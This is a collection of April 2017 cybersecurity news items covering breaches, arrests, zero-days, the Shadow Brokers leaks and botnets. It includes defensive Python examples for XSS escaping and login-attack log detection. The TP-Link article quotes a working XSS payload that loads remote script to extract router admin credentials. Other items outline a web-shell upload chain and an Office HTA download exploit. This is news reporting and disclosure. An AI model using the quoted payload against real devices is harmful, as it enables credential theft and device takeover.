However, the reality is that hackers seem to have been in the system for at least five months, unnoticed. It is perfectly feasible that they were able to steal more than just the card details. Christopher Boyd, a malware intelligence analyst at Malwarebytes, told SecurityWeek, "Even without considering the ramifications of swiped payment information, any compromise of a company selling video games to the public could prove to be a huge boon for a scammer. If they could obtain lists of titles purchased, for example, they could try phishing for specific games that require a login. Beyond that, they could identify certain titles as running on a gaming platform -- again, with its own login credentials.

"From there, they could sell those accounts on at a profit, or use them to phish further gamers. In this case, the information currently available suggests scammers may 'only' have payment information, but the danger is there to cause untold problems for people if just a little more (seemingly harmless) data were to be included."

At the very least the incident demonstrates just how hard it is for defenders to detect an attacker once inside the system. Once again it seems that the breach was only uncovered by a third party when the attackers started to monetize the theft.


Hacker Caused Panic in Dallas by Turning ON Every Emergency Siren at Once
10.4.2017 thehackernews Hacking  
We have seen hackers flooding 911 emergency service with rogue requests to knock the service offline for an entire state, but some hacking incidents are worse than others.
One such incident took place in Dallas on Friday night when a hacker triggered a network of 156 emergency warning sirens for about two hours, waking up residents and sparking fears of a disaster.
The emergency warning sirens — designed to warn the citizens of Texas about dangerous weather conditions, such as severe storms and tornadoes — were activated around 11:40 p.m. Friday and lasted until 1:20 a.m. Saturday.
The city officials tried to inform residents not to call 911 as there was not any emergency situation in the city, but the 911 system was nevertheless flooded with over 4,400 calls from panicked residents.
Rocky Vaz, director of the Dallas Office of Emergency Management (OEM), told the Dallas Morning News that the alarms blasted about 15 times for 90-second durations. You can even watch video footage of the incident posted by residents on social media.

The OEM technicians were eventually able to shut down the warning system and are working to keep this from happening again by implementing "more safeguards."
The city officials said the sirens were set off by a hacker who compromised the Dallas city's emergency alert system, but they did not disclose how the system was compromised or who may be responsible for the attack.
"We can state at this time that the City’s siren system was hacked Friday night," the Dallas Public Information Office confirmed on Saturday. "For security reasons, we cannot discuss the details of how this was done, but we do believe that the hack came from the Dallas area."
The officials have notified the Federal Communications Commission (FCC) for assistance in identifying the exact source of the hack.
This is the second time a hacker has attacked critical infrastructure in the city. Last year, an unknown hacker broke into some traffic signals in Dallas and used them to display jokes.
Dallas Mayor Mike Rawlings noted on his Facebook page that the incident is yet "another serious example of the need for us to upgrade and better safeguard our city’s technology infrastructure," adding that they’re working on identifying and prosecuting those responsible for the attack.


British Payday Loan Firm Wonga Suffers Data Breach

10.4.2017 securityweek CyberCrime  
British payday loan company Wonga has informed customers that their personal and financial data may have been stolen in a cyberattack.

According to Wonga, hackers gained unauthorized access to names, email addresses, physical addresses, phone numbers, partial payment card numbers (i.e. the last four digits), bank account numbers, and sort codes. The firm’s investigation is ongoing.

Wonga says there is no evidence that passwords have been compromised, but users who are concerned can change their passwords as a precaution. Impacted individuals are being notified.

The Guardian reported that the incident may have affected as many as 270,000 current and former customers in the United Kingdom and Poland. Roughly 245,000 of the potential victims are from the U.K.

While complete payment card data is not at risk, Wonga says it will alert financial institutions, and it has advised customers to contact their bank and ask them to be on the lookout for any suspicious activity.

The company has also warned affected customers of scams and other online activities that may leverage this incident in an effort to trick users into handing over sensitive information.

This is one of the biggest known data breaches suffered by a U.K. company. In recent months, breaches have also been reported by Camelot, which runs the U.K. National Lottery, business software firm Sage, and telecoms company Three.

The country’s Information Commissioner's Office (ICO) has launched an investigation into the incident, and it could lead to a significant fine. Telecoms firm TalkTalk received a record fine of £400,000 (roughly half a million dollars) for the October 2015 breach that affected more than 150,000 customers. The ICO can issue a maximum fine of £500,000 ($620,000).


Hack Sets Off City Emergency Alarms in Dallas

10.4.2017 securityweek Cyber 
The City of Dallas, Texas, emergency alarm system was compromised by a hacker or hackers late Friday night. All 156 outside sirens, usually used for severe weather warnings, were activated more than a dozen times between approximately 11:45 pm Friday and 1:20 am Saturday until engineers manually disabled the system.

The Dallas Outdoor Warning Sirens are designed to alert people outside to go indoors for shelter and information. The sirens are not meant to be heard indoors. Their primary function is to warn of imminent severe weather; but with no immediate sign of this, some people worried about reprisals for recent US military action in Syria.

The 911 emergency service, already under pressure through staff shortage, received approximately double its usual number of calls; and waiting time at its worst increased from the usual 10 seconds to around six minutes.

No details of the hack have yet been released, although it is believed the attacker is from the Dallas area. "For security reasons," said spokeswoman Sana Syed, "we cannot discuss the details of how this was done, but we do believe that the hack came from the Dallas area. We have notified the FCC for assistance in identifying the source of this hack. We are putting in safeguards to ensure this type of hack does not happen again."

Attacks against emergency alert systems are rare, but not unknown. In 2013, hackers breached an emergency alert system (EAS), causing TV stations in Michigan, California, Montana and New Mexico to broadcast a zombie warning, "the bodies of the dead are rising from their graves and attacking the living."

Dallas engineers are thought to have located the source of their own breach, and have ruled out both their control system and remote access. If the attacker breached the communications channels this could explain the belief that he or they are local to the area.

At the time of writing, the police had not been notified.

Dallas Mayor Mike Rawlings commented on Facebook, "This is yet another serious example of the need for us to upgrade and better safeguard our city's technology infrastructure. It's a costly proposition, which is why every dollar of taxpayer money must be spent with critical needs such as this in mind."

In November 2016, the City Council approved a $567,368 budget to maintain and repair the emergency sirens over the next six years. Michigan-based West Shore Services, a distributor of Federal Signal outdoor warning products, won the contract.

When approached over the weekend, West Shore's director of operations, Luke Miller, had not been informed of the breach by the Dallas Office of Emergency Management. "I am trying to get information along with everyone else," he said. "I don't know anything."

Martin Zinaich, chief security officer for the city of Tampa, Florida, told SecurityWeek, "We keep putting more and more 'things' (including critical infrastructure) on a public network that everyone in the world, both good and bad, have access to -- yet we still do not have information security being considered as part of a complete business risk profile."

Zinaich believes it is symptomatic of an ever-worsening cyber security condition that will require drastic action to solve. In a paper comparing cyber security to the long, slow descent and ultimate destruction of Eastern Air Lines Flight 401, he says, "In short, what we have put in place are insecure computing devices connected together using insecure protocols over a fabric connected to support some of our most critical dependencies and let anyone in the world -- good or bad -- have access to it."

His own solution would be for American CISOs to come together in a professional association, similar to the AMA, so that together they could influence the quality of security much as the AMA has influenced and improved the quality of medicine.


Serious Vulnerabilities Found in Riverbed SteelCentral Portal

10.4.2017 securityweek Vulnerability
Researchers at vulnerability management services provider Digital Defense have identified four security holes in Riverbed SteelCentral, a popular application and network performance monitoring product.

The flaws affect the SteelCentral Portal application and they can be exploited by unauthenticated attackers for remote command execution and to obtain user information. The vulnerabilities were reported to Riverbed Technology in January and they were later patched by the vendor.

According to Digital Defense, there are two remote command execution vulnerabilities that can be exploited to take full control of the host running the SteelCentral Portal application, and from there hijack all connected data sources using administrator credentials.

One of the flaws, related to the UploadImageServlet function, can be exploited to upload arbitrary files to a directory that is remotely accessible. An attacker can upload a JavaServer Page (JSP) shell that allows execution of arbitrary commands with SYSTEM privileges.

The second RCE weakness is related to the H2 web console, a service that can be accessed remotely without authentication. In its advisory, Digital Defense said the H2 console is designed for access during development, but it’s still present in the default installation of the SteelCentral Portal.

Researchers determined that the console can be used to access the Portal’s PostgreSQL database – this database normally doesn’t allow remote connections, but the H2 console bypasses the restriction by connecting from localhost.

“Once connected to the PostgreSQL database, an attacker can create a new table; insert the file content for a JSP shell into the table, then export the table contents to a file in the root directory of the web application. An attacker can then gain access to a web shell without authentication, and run arbitrary commands with SYSTEM privileges,” Digital Defense said in its advisory.

Experts have also identified two information disclosure flaws that can be exploited by unauthenticated attackers to enumerate usernames. Once the usernames are obtained, a hacker can launch a brute-force attack against the SteelCentral Portal interface.

Researchers managed to exploit the vulnerabilities in versions 1.3.1 and 1.4.0. Riverbed customers can obtain information on the patches through the company’s support portal.


Another Russian Hacker Arrested In Spain Reportedly Over U.S. Election Hacking
10.4.2017 thehackernews CyberCrime  
A Russian computer hacker and alleged spam kingpin was arrested in Barcelona, Spain, on Friday reportedly over suspicion of being involved in hacking attacks linked to alleged interference in last year's United States presidential election process.
36-year-old Pyotr Levashov from St. Petersburg was detained by police in Barcelona after US authorities issued an international arrest warrant for his arrest.
While the Russian embassy in Madrid announced Levashov's arrest on Sunday, it did not confirm the reason for his arrest.
This is the second arrest made by the Spanish authorities since the US 2016 election. In January, the police detained Stanislav Lisov, 32, on suspicion of creating and operating the NeverQuest Banking Trojan and possibly influencing the presidential election in Donald Trump's favor.
US authorities are planning to request the extradition of both hackers to the United States, where they are facing charges for their hacking-related crimes.
During an interview with Russian press agency RT, Levashov's wife Maria said that her husband was held "at the request of the American authorities in connection with cyber crime."
Maria spoke with Spanish officials, who mentioned "something about a virus that was supposedly created by [her] husband" and was related to Trump's victory in last year's presidential race.
Western security researchers have identified Levashov as Peter Severa (aka Peter Levashov) – the man who has also been listed in the world's Top 10 Worst Spammers maintained by anti-spam group Spamhaus, which has given him the 7th position in the list.
Peter Carr, a spokesperson for the Criminal Division of the US Department of Justice, told the news agency that "the US case remains under seal, so [they] have no information to provide at this time."
The US government has repeatedly accused Russia of hacking Democratic party and leaking personal data in order to influence election results in favor of Donald Trump, though Russian officials have repeatedly denied the accusations.
Congressional committees and the Federal Bureau of Investigation are examining links between Russia and Trump.


Critical Office Zero-Day Exploited in Attacks

10.4.2017 securityweek Vulnerability
An unpatched critical vulnerability in Microsoft Office is being exploited by malicious actors to achieve full code execution on target machines, McAfee and FireEye security researchers warn.

The vulnerability resides in the Object Linking and Embedding (OLE) functionality in Office and can be abused to create malicious RTF (Rich Text Format) documents that link to HTA (HTML Application) files hosted on remote servers. These HTA files load and execute a final malicious Visual Basic script.

“Because .hta is executable, the attacker gains full code execution on the victim’s machine,” McAfee explains, adding that the malicious RTF samples they observed were using the .doc extension.

Both McAfee and FireEye explain that this logical bug allows attackers to bypass memory-based mitigations developed by Microsoft, as well as other security products. The malicious documents are used to download and execute malicious payloads pertaining to various well-known malware families.

The HTA files used in the observed attacks were masquerading as normal RTF files to trick users and evade detection. When successful, the exploit closes the original Office document, then opens a new one and displays it to the victim, while the malicious code is being installed in the background.

“In both observed documents the malicious script terminated the winword.exe process, downloaded additional payload(s), and loaded a decoy document for the user to see. The original winword.exe process is terminated in order to hide a user prompt generated by the OLE2link,” FireEye explains.

The vulnerability was initially observed in January, but attacks that leverage it continue to surface, McAfee says. The security company said that all Office versions are affected by this issue, including Office 2016 on Windows 10.

According to FireEye, they too have been aware of the vulnerability for some time, but they have been coordinating with Microsoft for several weeks to release information on the matter only after a patch was available. Microsoft’s next set of security patches is scheduled to roll out as soon as this Tuesday.

Users are advised to avoid opening Office files that come from unknown sources and to leave Office Protected View enabled to ensure no malicious code runs without their knowledge. Apparently, the vulnerability can’t bypass Protected View.


Alleged Kelihos Botnet Author Arrested in Spain

10.4.2017 securityweek BotNet
A Russian national arrested by the Spanish police last week is believed to be the programmer behind the infamous Kelihos spam botnet.

The man, Pyotr Levashov, was arrested in Barcelona, Spain, while on vacation, supposedly on an arrest warrant issued by United States authorities. The arrest has already been confirmed by the Russian embassy in Madrid, but no official details on why he was detained have been provided.

While mainstream media initially reported that the arrest might be tied to an interference in last year's U.S. election, it appears that Levashov was actually arrested for his involvement in the development and running of a large spam botnet.

In December 2016, the U.S. officially attributed election hacks to Russian threat groups, and also announced a series of sanctions against Russian nationals, also related to the election hacks. The attribution report, however, failed to achieve its purpose, security experts argued.

According to Reuters, Russian television station RT claimed a connection between Levashov’s arrest and the cybercriminal interference with the U.S. election, but a U.S. Department of Justice official has already confirmed that the arrest doesn’t have “an apparent national security connection.”

A NYTimes article also notes that Levashov doesn’t have an apparent connection to the election hacks, but that he is one of the most wanted spammers worldwide. Also known as Peter Severa, he is believed to be responsible for a long-running computer spam business.

Pyotr Levashov, who also uses the aliases Peter Severa and Peter of the North, is supposedly connected to the Waledac and Kelihos spam botnets, Brian Krebs reports. As he points out, Levashov is present on Spamhaus’ global Top 10 Worst Spammers.

Capable of sending around 1.5 billion spam messages a day, Waledac was taken down in 2010, but Kelihos emerged the same year, featuring many code similarities with the previous threat. However, the new malware variant wasn’t considered as part of the Waledac family, as it was a new and separate spam botnet.

Kelihos is currently one of the largest spam bots out there, and has been able to withstand several takedown attempts by security companies. Last year, the botnet was observed tripling its size overnight, and is currently placed first in Check Point’s Top 10 malware threats. Earlier this year, it also displayed worm-like distribution capabilities.

According to Krebs, while there is ample evidence tying Levashov to Waledac/Kelihos, the man is also believed to be connected to a series of criminal operations where malware authors and spammers were paid to install “fake antivirus” software that would display an overwhelming amount of alerts to victims, in an attempt to force them into buying bogus software.

Levashov is said to have made more money renting the spam botnets to other cybercriminals than running the email-blasting operations on his own. Reportedly, he would demand $300 per million messages promoting auction and employment scams, and $500 per million phishing emails. Recently, the Kelihos botnet was observed distributing ransomware.


Alleged Russian hacker arrested in Spain reportedly over US Presidential Election Hack
10.4.2017 securityaffairs CyberCrime

Spanish law enforcement arrested in Barcelona the Russian hacker Pyotr Levashov, who is suspected of being involved in attacks on the 2016 US Election.
Spanish law enforcement arrested in Barcelona the Russian hacker and alleged spam kingpin Pyotr Levashov (36). The man is suspected of being involved in hacking attacks against entities linked to the 2016 US Presidential Election.

The Russian embassy in Madrid confirmed the arrest of the suspect but did not disclose the reason for the arrest.

“Russian television station RT reported that Levashov was arrested under a U.S. international arrest warrant and was suspected of being involved in hacking attacks linked to alleged interference in last year’s U.S. election.” reported the Reuters Agency.

Peter Carr, a spokesman for the U.S. Justice Department’s criminal division, said: “The U.S. case remains under seal, so we have no information to provide at this time.”

A U.S. Department of Justice official told Reuters that the man was suspected of cyber crime and not of state-sponsored hacking.

Pyotr Levashov was detained by the Spanish police in Barcelona after the US authorities issued an international arrest warrant for the arrest of the Russian hacker.

The arrest of Levashov is the second one made by the Spanish police related to hackers suspected of being involved in the attacks against the US 2016 election. In January, the police

Early this year, the Spanish police arrested the hacker Stanislav Lisov (32) on suspicion of creating and distributing the dreaded NeverQuest Banking Trojan. The authorities believe he was also involved in the attacks against the US Presidential Election.


The Neverquest banking trojan, aka Vawtrak, is very popular in the criminal underground. It has been around for several years and has been used to target hundreds of financial institutions worldwide.

One of the last variants, discovered in summer 2016, was spotted by experts from the firm Fidelis. The new version of the Neverquest malware included significant improvements such as SSL pinning and a DGA mechanism that generates .ru domains with a pseudorandom number generator (PRNG) found in the loader.

The US authorities are going to request the extradition of both hackers arrested in Spain to the United States.

Security experts linked Levashov to Peter Severa (aka Peter Levashov) one of the Top 10 Worst Spammers in the world.

The US government has repeatedly accused the Kremlin of hacking the Democratic Party in order to influence the final result of the election.


How to get admin credentials from TP-Link M5350 3G/Wi-Fi modem with a text message
10.4.2017 securityaffairs  Hacking

A German security researcher discovered how to retrieve the admin credentials from a TP-Link M5350 3G/Wi-Fi modem with an evil text message
Some bugs are both strange and dangerous; this is the case with a flaw affecting TP-Link’s M5350 3G/Wi-Fi router that can expose admin credentials to a malicious text message.

The bug was discovered by security researcher Jan Hörsch of the German firm Securai. It is a cross-site scripting (XSS) vulnerability that can be triggered by simply sending the device an SMS containing the following script:

<script src=//n.ms/a.js></script>

“Among other things, he showed that the mobile router from TP-Link M5350 is permanently vulnerable to cross-site scripting, which is triggered by SMS. If an attacker sends an SMS with the appropriate content, the router answers with the login data of the admin – including the password in the plaintext.” reported Heise.de.

Hörsch conducted intensive research on various Internet-of-Things devices and discovered multiple vulnerabilities. He analyzed the firmware running on several smart objects and found multiple bugs that are easy to exploit; the results of the research were presented at the recent Kaspersky Security Analyst Summit.

The flaw in TP-Link’s M5350 3G/Wi-Fi modem appears to be a feature created by the developers, likely for testing purposes, that unfortunately was not removed from the production firmware.

The device’s admin credentials can be retrieved by an attacker with a simple text message, the router replies with admin username, admin password, its SSID, and its login password.


It is unlikely that the bug has been fixed by TP-Link: a look at the firmware download page for the TP-Link M5350 shows that the most recent version for the flawed device is M5350_V2_140115, released in January 2015.

Hörsch also analyzed a Panasonic BM ET200 retina scanner and a Startech modem, both devices affected by flaws.
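The bug class described above, as an added example that is not TP-Link's firmware code: an assumed admin page that concatenates SMS text straight into HTML (the vulnerable pattern) beside a version that escapes every untrusted field at output time, with a Content-Security-Policy header as defense in depth. The inbox contents are constructed; the second message body is the script quoted in the article.

```python
import html
from typing import Dict, List

# Constructed inbox (not captured from a device). The second body is the
# payload quoted in the article; on a vulnerable page it becomes live markup.
INBOX: List[Dict[str, str]] = [
    {"sender": "+49 123 456789", "body": "Dinner at 8?"},
    {"sender": "+49 000 000000", "body": "<script src=//n.ms/a.js></script>"},
]


def render_inbox_unsafe(messages: List[Dict[str, str]]) -> str:
    """Assumed vulnerable pattern: SMS fields are interpolated into the admin
    page unchanged, so a <script> tag in an SMS runs in the admin's browser
    with the router session and can read whatever the page exposes."""
    rows = "".join(
        f"<tr><td>{m['sender']}</td><td>{m['body']}</td></tr>" for m in messages
    )
    return f"<table class='sms'>{rows}</table>"


def render_inbox_safe(messages: List[Dict[str, str]]) -> str:
    """Hardened version: every attacker-controlled field (sender, body) is
    HTML-escaped at the point where it is written into markup."""
    def cell(value: str) -> str:
        # quote=True also neutralises " and ' so the text is safe inside
        # attribute values, not only inside element bodies.
        return html.escape(value, quote=True)

    rows = "".join(
        f"<tr><td>{cell(m['sender'])}</td><td>{cell(m['body'])}</td></tr>"
        for m in messages
    )
    return f"<table class='sms'>{rows}</table>"


# Defense in depth for the web UI's responses: even if one escape is missed,
# a browser honouring this policy will not fetch a script from a foreign host
# such as the n.ms domain in the sample payload.
SECURITY_HEADERS: Dict[str, str] = {
    "Content-Security-Policy": "default-src 'self'; script-src 'self'; "
                               "object-src 'none'; base-uri 'none'",
    "X-Content-Type-Options": "nosniff",
}


def contains_live_script(rendered_html: str) -> bool:
    """True when the rendered page still carries an unescaped <script> tag."""
    return "<script" in rendered_html.lower()


if __name__ == "__main__":
    print("unsafe render executes SMS markup:", contains_live_script(render_inbox_unsafe(INBOX)))
    print("safe render executes SMS markup:  ", contains_live_script(render_inbox_safe(INBOX)))
```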


Researchers warn of a Windows Zero-Day Attack observed in the wild
10.4.2017 securityaffairs Vulnerability

Security researchers from the firms McAfee and FireEye are warning of a Windows zero-day attack in the wild that puts Microsoft users at risk of being hacked.
Security researchers from security firms McAfee and FireEye are warning of hackers exploiting an

Just opening an MS Word document could put you at risk: exploiting the flaw allows an attacker to silently install malware on a fully patched Windows machine.

The attack vectors are malicious emails that come with a weaponized Word document containing a booby-trapped OLE2link object.

“The attack involves a threat actor emailing a Microsoft Word document to a targeted user with an embedded OLE2link object. When the user opens the document, winword.exe issues a HTTP request to a remote server to retrieve a malicious .hta file, which appears as a fake RTF file. The Microsoft HTA application loads and executes the malicious script.” reads the analysis shared by FireEye. “In both observed documents the malicious script terminated the winword.exe process, downloaded additional payload(s), and loaded a decoy document for the user to see. The original winword.exe process is terminated in order to hide a user prompt generated by the OLE2link.” “The vulnerability is bypassing most mitigations.”

When the user opens the document, the malicious code is executed; it first connects to a remote server to download a malicious HTML application file (HTA) that is masquerading as a document created in Microsoft’s RTF (Rich Text Format).

Windows Zero-Day Attack

The HTA file is then executed automatically, giving the attackers full code execution on the target machine and letting them download additional malicious payloads to fully compromise it.

The Windows zero-day attack relies on .hta content that is disguised as a normal RTF file to evade security solutions, but researchers at McAfee spotted the malicious Visual Basic scripts in a later part of the file.

The exploit displays a decoy Word document for the victims to see before terminating to avoid suspicion.

“The successful exploit closes the bait Word document and pops up a fake one to show the victim. In the background, the malware has already been stealthily installed on the victim’s system.” reads a blog post published by McAfee.

“The root cause of the zero-day vulnerability is related to the Windows Object Linking and Embedding (OLE), an important feature of Office. (Check our Black Hat USA 2015 presentation, in which we examine the attack surface of this feature.)”

This Windows zero-day attack is very insidious: it does not require any interaction from the victim beyond opening the document; for example, it does not need the victim to enable macros.

The Windows zero-day attack works on all Windows OS versions, even against Windows 10.

McAfee had reported the Windows zero-day attacks to Microsoft back in January 2017; with the flaw still unpatched, the firm decided to publicly disclose the vulnerability, and a day later FireEye did the same.

This Tuesday Microsoft will release its security updates; let’s hope the company also addresses the zero-day exploited in the wild.

Below are the recommendations to mitigate this kind of Windows zero-day attack:

Do not open any Office files obtained from untrusted locations.
According to our tests, this active attack cannot bypass the Office Protected View, so we suggest everyone ensure that Office Protected View is enabled.


Shadow Brokers Release More NSA Exploits

10.4.2017 securityweek BigBrothers
The hacker group calling itself “Shadow Brokers” has released another round of exploits and tools allegedly used by the NSA-linked threat actor “Equation Group,” along with a message to U.S. President Donald Trump.

Over the weekend, the group published the password to a previously released password-protected archive. An analysis of the files revealed the existence of various exploits and lists of organizations apparently targeted by the Equation Group.

Google Project Zero researcher Tavis Ormandy said one of the leaked exploits, dubbed EXACTCHANGE, relies on a Linux kernel vulnerability that can be exploited for local privilege escalation. Ormandy believes the Equation Group had the exploit “for years” before it was discovered by Google researchers in 2009.

An analysis conducted by Maksym Zaitsev showed that the leaked files include what appear to be Solaris exploits, a cross-platform RAT, Linux keyloggers, exploits targeting Cisco firewalls, system fingerprinting tools, an IP.Board exploit, and Apache and Samba zero-days affecting several Linux distributions.

A researcher who uses the online moniker “x0rz” also analyzed the latest dump and identified a tool that can clean logs (TOAST), a fake Chinese browser (ELECTRICSLIDE), and several GSM-related tools (CURSEHAPPY, EDITIONHAZE, LIQUIDSTEEL, SHAKENGIRAFFE, WHOLEBLUE). He also found evidence that the Equation Group had been looking for clues of attacks by other threat actors on compromised systems.

Experts also found lists of IP addresses and domain names that may belong to organizations targeted by the Equation Group, and they pointed out that victims include U.S. allies.

The Shadow Brokers had initially attempted to sell the exploits they obtained, but none of their strategies, including auctions and direct sale offers, was successful. While the group has now made available another batch of files for free, Zaitsev and others, including Edward Snowden, believe there are still some files that have not been released.

Edward Snowden (@Snowden), 8 Apr 2017, in two tweets: “Quick review of the #ShadowBrokers leak of Top Secret NSA tools reveals it's nowhere near the full library, but there's still so much here that NSA should be able to instantly identify where this set came from and how they lost it. If they can't, it's a scandal.”

In a message they posted on Medium, the Shadow Brokers told President Trump that they are disappointed by his actions.

“TheShadowBrokers voted for you,” the hackers said. “TheShadowBrokers supports you. TheShadowBrokers is losing faith in you. Mr. Trump helping theshadowbrokers, helping you. Is appearing you are abandoning ‘your base’, ‘the movement’, and the peoples who getting you elected.”

The group has once again claimed that it is not connected to Russia, but they did say that Russia and Putin are the United States’ “best allies until the common enemies are defeated and America is great again.”

However, some people have pointed out that the timing of the leak is suspicious – it comes shortly after the U.S. decided to bomb Syria, which is an ally of Russia. Some experts had previously suggested that the Shadow Brokers is actually an English-speaking group.

While many of the exploits leaked previously by Shadow Brokers turned out to rely on old vulnerabilities, some companies, including Cisco, did identify some zero-days. It remains to be seen if tech companies confirm any unpatched flaws in the latest leaks.


Sathurbot Botnet Targets WordPress Accounts

10.4.2017 securityweek BotNet

A recently observed backdoor Trojan is ensnaring victims’ computers into a botnet that attempts to brute-force its way into WordPress accounts. The compromised WordPress sites are then used to spread the malware further.

Dubbed Sathurbot, the backdoor Trojan uses torrents as a delivery medium. Compromised websites are used to host fake movie and software torrents and, when a user searches the web for a movie or software to download, links to these websites are served instead of legitimate torrents.

Users accessing movie subpages are served with the same torrent file, while those going for software are served a different torrent file. Because the torrents are well-seeded, they might appear legitimate. Both the movie and the software torrent contain an executable and are meant to entice the victim into running it, thus loading the Sathurbot DLL.

Once launched, the malware informs the victim that their machine has become a bot in the Sathurbot network. Sathurbot also retrieves its command and control (C&C) at startup. Communication with the server involves status reporting, task retrieval, and the receiving of links to other malware downloads.

“Sathurbot can update itself and download and start other executables. We have seen variations of Boaxxe, Kovter and Fleercivet, but that is not necessarily an exhaustive list,” ESET security researchers warn.

The malware reports its successful installation and a listening port to the server, and also reports back periodically, while waiting for additional tasks.

Sathurbot comes with some 5,000-plus basic generic words that are randomly combined to form 2-4 word phrases used as query strings via popular search engines. It then selects a random 2-4 word long text chunk from the webpage of each URL in the search results, and uses it for the next round of search queries. The second set of search results is used to harvest domain names.

The threat selects only the domains that are created using WordPress, but it appears that the threat is also interested in the Drupal, Joomla, PHP-NUKE, phpFox, and DedeCMS frameworks. The malware sends the harvested domains to the C&C.

The bot then receives a list of domain access credentials (formatted as login:password@domain) that it then probes for access, and ESET says that different bots try different login credentials for the same site. Further, to avoid being blocked, each bot only tries a single login per site and moves to the next domain.

“During our testing, lists of 10,000 items to probe were returned by the C&C,” ESET reveals. They also note that the XML-RPC API (particularly, the wp.getUsersBlogs API) of WordPress is used in the attack.

The bot also has the libtorrent library integrated, and is designed to become a seeder by downloading a binary file and creating the torrent. However, it appears that not all bots in the network perform all of these functions, as some are only used as web crawlers, others only attack the XML-RPC API, while others do both. Not all bots become seeders either.

“The above-mentioned attempts on /wp-login.php from a multitude of users, even to websites that do not host WordPress, is the direct impact of Sathurbot. Many web admins observe this and wonder why it is happening. In addition, WordPress sites can see the potential attacks on wp.getUsersBlogs in their logs,” the security researchers explain.
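
The one-attempt-per-bot behaviour described above is exactly what defeats per-IP lockout rules, so the useful signal in a web server log is the opposite shape: many distinct source addresses each making a single POST to `/wp-login.php` or `/xmlrpc.php` in a short window, on hosts that may not even run WordPress. The following Python detector is an added example, not ESET’s code or Sathurbot’s; the access-log lines, the IP addresses (documentation ranges) and the thresholds are constructed for illustration. It contrasts the distributed pattern with the classic single-source burst, which per-IP rate limiting already catches.

```python
"""Spot a distributed, one-attempt-per-bot login campaign in web logs.

Added example (not ESET's code): Sathurbot, as described above, has each
bot try a single credential per site before moving on, so per-IP lockout
rules never fire. The indicator is instead many distinct source IPs each
making one POST to /wp-login.php or /xmlrpc.php in a short window.
"""
import re
from collections import Counter, defaultdict

LOGIN_PATHS = {"/wp-login.php", "/xmlrpc.php"}

# Apache/nginx "combined" format: ip ident user [ts] "METHOD path proto" status ...
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def parse(lines):
    """Yield the fields of every line that matches the combined log format."""
    for line in lines:
        m = LINE_RE.match(line)
        if m:
            yield m.groupdict()


def find_distributed_login_attempts(lines, min_sources=5, max_per_source=1):
    """Login paths hit by >= min_sources IPs, none making more than max_per_source attempts."""
    per_path = defaultdict(Counter)
    for ev in parse(lines):
        if ev["method"] == "POST" and ev["path"] in LOGIN_PATHS:
            per_path[ev["path"]][ev["ip"]] += 1
    findings = {}
    for path, ips in per_path.items():
        if len(ips) >= min_sources and max(ips.values()) <= max_per_source:
            findings[path] = {"sources": len(ips), "attempts": sum(ips.values())}
    return findings


def find_single_source_bursts(lines, min_attempts=3):
    """The classic pattern: one IP hammering a login endpoint (per-IP limits catch this)."""
    counts = Counter()
    for ev in parse(lines):
        if ev["method"] == "POST" and ev["path"] in LOGIN_PATHS:
            counts[(ev["path"], ev["ip"])] += 1
    return {k: v for k, v in counts.items() if v >= min_attempts}


# Constructed log lines (not from a real server): six bots, one login each,
# followed by one noisy scanner and some ordinary browsing.
SAMPLE_LOG = [
    '203.0.113.10 - - [10/Apr/2017:08:01:12 +0000] "POST /wp-login.php HTTP/1.1" 200 3912 "-" "Mozilla/5.0"',
    '203.0.113.11 - - [10/Apr/2017:08:01:40 +0000] "POST /wp-login.php HTTP/1.1" 200 3912 "-" "Mozilla/5.0"',
    '203.0.113.12 - - [10/Apr/2017:08:02:05 +0000] "POST /wp-login.php HTTP/1.1" 200 3912 "-" "Mozilla/5.0"',
    '203.0.113.13 - - [10/Apr/2017:08:02:33 +0000] "POST /wp-login.php HTTP/1.1" 200 3912 "-" "Mozilla/5.0"',
    '203.0.113.14 - - [10/Apr/2017:08:03:01 +0000] "POST /wp-login.php HTTP/1.1" 200 3912 "-" "Mozilla/5.0"',
    '203.0.113.15 - - [10/Apr/2017:08:03:29 +0000] "POST /wp-login.php HTTP/1.1" 200 3912 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Apr/2017:08:04:00 +0000] "POST /xmlrpc.php HTTP/1.1" 200 512 "-" "python-requests/2.13"',
    '198.51.100.7 - - [10/Apr/2017:08:04:01 +0000] "POST /xmlrpc.php HTTP/1.1" 200 512 "-" "python-requests/2.13"',
    '198.51.100.7 - - [10/Apr/2017:08:04:02 +0000] "POST /xmlrpc.php HTTP/1.1" 200 512 "-" "python-requests/2.13"',
    '192.0.2.44 - - [10/Apr/2017:08:05:10 +0000] "GET /index.php HTTP/1.1" 200 8120 "-" "Mozilla/5.0"',
    '192.0.2.44 - - [10/Apr/2017:08:05:11 +0000] "GET /wp-login.php HTTP/1.1" 200 2210 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    print("distributed:", find_distributed_login_attempts(SAMPLE_LOG))
    print("bursts:", find_single_source_bursts(SAMPLE_LOG))
```

On a real server, run the distributed check over a sliding window (an hour is a reasonable start) and raise the threshold to match normal login volume. The XML-RPC method name (`wp.getUsersBlogs`) is in the POST body, not the access log, so a WordPress-side logging plugin or a WAF rule is needed to see it; at the web-server level the presence of POSTs to `/xmlrpc.php` on a site that never uses the API is already enough to block or alert.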

Consisting of over 20,000 infected computers, Sathurbot is believed to have been active since at least June 2016.


Flaw in Popular Framework Exposes Many ICS Devices to Attacks

10.4.2017 securityweek ICS
Hundreds of thousands of Industrial Internet of Things (IIoT) and industrial control systems (ICS) products could be exposed to hacker attacks due to critical vulnerabilities affecting a widely used piece of software from Germany-based 3S-Smart Software Solutions.

The flaws affect the CODESYS automation software for developing and engineering controller applications, specifically the Web Server component of the CODESYS WebVisu visualization software. The issues have been fixed by 3S-Smart Software Solutions, but experts believe it will take some time until the patch reaches all vulnerable devices.

The security holes, discovered by researchers at industrial cybersecurity startup CyberX, affect CODESYS Web Server 2.3 and prior, and they have been addressed with patch version 1.1.9.18. ICS-CERT has published an advisory describing the flaws.

One of the vulnerabilities, tracked as CVE-2017-6027, allows an attacker to upload arbitrary files to the CODESYS Web Server by sending a specially crafted request. Exploitation of the flaw can lead to arbitrary code execution.

The second vulnerability, identified as CVE-2017-6025, is a stack-based buffer overflow that exists because the size of strings sent to the functions that handle the XML is not properly checked before they are copied to memory. An attacker can exploit this weakness to crash the application or execute arbitrary code.


